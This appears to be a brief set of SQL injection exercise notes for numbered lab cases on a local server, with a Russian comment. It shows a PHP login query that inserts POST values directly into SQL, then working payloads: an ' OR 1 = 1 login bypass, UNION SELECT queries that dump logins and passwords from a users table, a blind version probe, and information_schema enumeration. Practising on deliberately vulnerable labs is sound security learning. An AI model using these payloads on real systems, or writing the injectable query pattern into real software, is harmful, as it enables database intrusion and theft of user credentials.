1) 
$sql  = "SELECT login, password FROM users WHERE login = '${_POST['login']}' AND password = SHA1('${_POST['password']}')";

' OR 1 = 1;--  // пробел в конце!
whatever


2) 
http://localhost:8081/cases/2/?month=-1 union all select login, password, null, null, null from users;--

3) 
http://localhost:8081/cases/3/?id=1 AND SUBSTR(@@version, 1, 1) = 5



4)
// http://localhost:8081/cases/4/?month=-1 union select table_schema, table_name, null, null, null from information_schema.tables;--
// http://localhost:8081/cases/4/?month=-1 union select column_name, null, null, null, null from information_schema.tables where table_name = 'users';--
' UNION SELECT login, password, null from users WHERE '1' = '1
